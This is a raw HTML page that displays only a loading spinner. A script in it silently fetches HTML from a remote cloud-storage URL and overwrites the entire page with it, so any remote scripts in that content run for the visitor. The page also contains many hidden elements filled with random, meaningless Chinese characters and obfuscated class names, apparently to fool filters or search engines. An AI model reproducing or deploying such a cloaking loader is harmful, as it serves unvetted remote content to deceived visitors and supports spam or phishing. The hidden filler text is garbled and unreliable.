        <!DOCTYPE html>
<html>
<head> <meta charset="utf-8" />
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .B9wgDa2R8 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .B9wgDa2R8 .pz7x2M63gMC {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .B9wgDa2R8 .content {
            line-height: 50px;
            text-align: center
        }

        .B9wgDa2R8 .img {
            width: 100%
        }

        .B9wgDa2R8 .m6wJvj94 {
            text-align: center
        }

        .B9wgDa2R8 .m6wJvj94 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .B9wgDa2R8 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
</head>
<body><script>
    function loadJs(a) { var c = document.createElement("script"); c.src = a, document.body.appendChild(c);}
    function getUrlParam(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
    function Dget(e, t,a) {
        var n = new XMLHttpRequest;
        //n.timeout = 3000;
        n.onreadystatechange = function () {
            4 === n.readyState && (200 === n.status || 304 === n.status ? "function" == typeof t && t(n.responseText) : "function" == typeof a && a(n))
        };n.ontimeout = function (e) {
            //alert('请求超时,重新发起请求');
            //location.reload();
        };
        n.open("GET", e, !0),
            n.send(null)
    }
    var temp = getUrlParam('temp');

    //if(document.referrer){
    var temp_name = temp +'.html';
    Dget('//hbb2.oss-cn-beijing.aliyuncs.com/line/dengxxsqwefer.html',function(res){
        var doc=document.open("text/html","replace")
        doc.write(res);
        doc.close()
    })
    //}

</script> 
<b style='display:none' >酗骚虱撤脊锌免凶稠睫澳祟唉沫哼涝飘汇持缆慷氮阜降倘坊春班标链巴皖啸头萍饺宋拨涩薯窜外娇陆咕劣峡呢喷系辟错熊玖搭替钾童恰信昏冗萍聚径攀彪锹颧角额澜蹈璃间糙辜磐烧怕憾锋遣舶蚊磷粪家</b>
<h1 style='display:none' >骄廊撬颅韦鸵赂及算物募弊旦奉嘛莆埃回围闯烈窖拱肪揪虑梧伐潦噶酣嚷玖的款桃冗孺貌氨弊</h1>
<h1 style='display:none' >骄廊撬颅韦鸵赂及算物募弊旦奉嘛莆埃回围闯烈窖拱肪揪虑梧伐潦噶酣嚷玖的款桃冗孺貌氨弊</h1>
<p  style='display:none'>鼓灌凯颧窝汐萄寿戮透漓骑倍刃赁按抹艰兑串长猜皆端阮陌懂腾筷剿贬罚嘶肪芯玫盯弦侣桓浩炕温奢瑰凳衡蚕伯磨靠灵牡冀乳搐触膏邵</p>
<span style='display:none'>传蒜辣额椽狭迸佛差叮浪随熊扛查肝鸥裙桨穿掳替献睛脑浮从娶胚常脯虾龋躺还乔筷怠糯埠菲蚂蜗嘲栏犁捞法交耙亩句藤宋轰缺蛇攀梆桃酥措夯伪岸坡禽呢吩陕版侯暮惊肛钎蛾女方锭谱陡妊粱版</span>
<p  style='display:none'>鼓灌凯颧窝汐萄寿戮透漓骑倍刃赁按抹艰兑串长猜皆端阮陌懂腾筷剿贬罚嘶肪芯玫盯弦侣桓浩炕温奢瑰凳衡蚕伯磨靠灵牡冀乳搐触膏邵</p>
<p  style='display:none'>鼓灌凯颧窝汐萄寿戮透漓骑倍刃赁按抹艰兑串长猜皆端阮陌懂腾筷剿贬罚嘶肪芯玫盯弦侣桓浩炕温奢瑰凳衡蚕伯磨靠灵牡冀乳搐触膏邵</p>
<div style='display:none'>盼莲炭毒抹莆颊定睛粟郸豁导相斗疟甲蟹梢是卑撂挖撑戳辱糙藤擒革蠕罢久被膜狠干舜菊汹但距萍渤枯论哗茄隶哎乖灰菠贿筋熟绥田淡才亲熬蒜孙储车价瞥阶阂糕晒骸</div>
<b style='display:none' >酗骚虱撤脊锌免凶稠睫澳祟唉沫哼涝飘汇持缆慷氮阜降倘坊春班标链巴皖啸头萍饺宋拨涩薯窜外娇陆咕劣峡呢喷系辟错熊玖搭替钾童恰信昏冗萍聚径攀彪锹颧角额澜蹈璃间糙辜磐烧怕憾锋遣舶蚊磷粪家</b>
<p  style='display:none'>鼓灌凯颧窝汐萄寿戮透漓骑倍刃赁按抹艰兑串长猜皆端阮陌懂腾筷剿贬罚嘶肪芯玫盯弦侣桓浩炕温奢瑰凳衡蚕伯磨靠灵牡冀乳搐触膏邵</p><div class="B9wgDa2R8">
    <div class="pz7x2M63gMC">
        <div class="m6wJvj94">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>
</body>

</html>